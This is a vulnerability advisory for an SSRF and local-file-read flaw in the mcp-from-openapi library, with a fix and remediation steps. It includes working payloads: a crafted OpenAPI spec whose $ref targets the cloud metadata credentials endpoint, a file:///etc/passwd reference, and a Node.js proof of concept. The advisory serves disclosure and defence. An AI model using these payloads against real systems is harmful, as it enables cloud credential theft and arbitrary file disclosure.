EUVD-2026-20632
GHSA-v6ph-xcq9-qxxj
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
Lifecycle Timeline
4Description
## Summary The `mcp-from-openapi` library uses `@apidevtools/json-schema-ref-parser` to dereference `$ref` pointers in OpenAPI specifications without configuring any URL restrictions or custom resolvers. A malicious OpenAPI specification containing `$ref` values pointing to internal network addresses, cloud metadata endpoints, or local files will cause the library to fetch those resources during the `initialize()` call. This enables Server-Side Request Forgery (SSRF) and local file read attacks when processing untrusted OpenAPI specifications. ## Affected Versions `<= 2.1.2` (latest) ## CWE CWE-918: Server-Side Request Forgery (SSRF) ## Vulnerability Details **File:** `index.js` lines 870-875 When `OpenAPIToolGenerator.initialize()` is called, it dereferences the OpenAPI document using `json-schema-ref-parser`: ```javascript this.dereferencedDocument = await import_json_schema_ref_parser.default.dereference( JSON.parse(JSON.stringify(this.document)) ); ``` No options are passed to `.dereference()` - no URL allowlist, no custom resolvers, no protocol restrictions. The ref parser fetches any URL it encounters in `$ref` values, including: - `http://` and `https://` URLs (internal services, cloud metadata) - `file://` URLs (local filesystem) This is the default behavior of `json-schema-ref-parser` - it resolves all `$ref` pointers by fetching the referenced resource. ## Exploitation ### Attack 1: SSRF to internal services / cloud metadata A malicious OpenAPI spec containing: ```json { "openapi": "3.0.0", "info": { "title": "Evil API", "version": "1.0" }, "paths": { "/test": { "get": { "operationId": "getTest", "summary": "test", "responses": { "200": { "description": "OK", "content": { "application/json": { "schema": { "$ref": "http://169.254.169.254/latest/meta-data/iam/security-credentials/" } } } } } } } } } ``` When processed by `OpenAPIToolGenerator`, the library fetches `http://169.254.169.254/latest/meta-data/iam/security-credentials/` from the server, potentially leaking AWS IAM credentials. ### Attack 2: Local file read ```json { "$ref": "file:///etc/passwd" } ``` The ref parser reads local files and includes their contents in the dereferenced output. ## Proof of Concept ```javascript const http = require('http'); const { OpenAPIToolGenerator } = require('mcp-from-openapi'); // Start attacker server to prove SSRF const srv = http.createServer((req, res) => { console.log(`SSRF HIT: ${req.method} ${req.url}`); res.writeHead(200, {'Content-Type': 'application/json'}); res.end('{"type":"string"}'); }); srv.listen(9997, async () => { const spec = { openapi: '3.0.0', info: { title: 'Evil', version: '1.0' }, paths: { '/test': { get: { operationId: 'getTest', summary: 'test', responses: { '200': { description: 'OK', content: { 'application/json': { schema: { '$ref': 'http://127.0.0.1:9997/ssrf-proof' } } } } } } } } }; const gen = new OpenAPIToolGenerator(spec, { validate: false }); await gen.initialize(); // Output: "SSRF HIT: GET /ssrf-proof" // The library fetched our attacker URL during $ref dereferencing. srv.close(); }); ``` **Tested and confirmed** on mcp-from-openapi v2.1.2. The attacker server receives the GET request during `initialize()`. ## Impact - **Cloud credential theft** - `$ref` pointing to `http://169.254.169.254/` steals AWS/GCP/Azure metadata - **Internal network scanning** - `$ref` values can probe internal services and ports - **Local file read** - `file://` protocol reads arbitrary files from the server filesystem - **No privileges required** - attacker only needs to provide a crafted OpenAPI spec to any application using this library ## Suggested Fix Pass resolver options to `dereference()` that restrict which protocols and hosts are allowed: ```javascript this.dereferencedDocument = await $RefParser.dereference( JSON.parse(JSON.stringify(this.document)), { resolve: { file: false, // Disable file:// protocol http: { // Only allow same-origin or explicitly allowed hosts headers: this.options.headers, timeout: this.options.timeout, } } } ); ``` Or disable all external resolution and require all schemas to be inline: ```javascript this.dereferencedDocument = await $RefParser.dereference( JSON.parse(JSON.stringify(this.document)), { resolve: { file: false, http: false, https: false } } ); ```
Analysis
Server-Side Request Forgery in mcp-from-openapi (<= 2.1.2) allows unauthenticated remote attackers to retrieve cloud metadata credentials, scan internal networks, and read local files by providing malicious OpenAPI specifications containing $ref pointers to internal URLs (http://169.254.169.254/) or file:// paths. The library's json-schema-ref-parser fetches referenced resources without protocol or hostname restrictions during OpenAPI document initialization, enabling AWS/GCP/Azure credential theft and arbitrary file disclosure with no privileges required beyond spec submission.
Sign in for full analysis, threat intelligence, and remediation guidance.
Remediation
Within 24 hours: Identify all applications and services using mcp-from-openapi library and assess their exposure (prioritize systems processing external OpenAPI specifications). Within 7 days: Implement network-level mitigations (restrict egress to 169.254.169.254 and file:// protocol handling at firewall/container level) and disable OpenAPI spec upload functionality if not business-critical. …
Sign in for detailed remediation steps.
Priority Score
Share
External POC / Exploit Code
Leaving vuln.today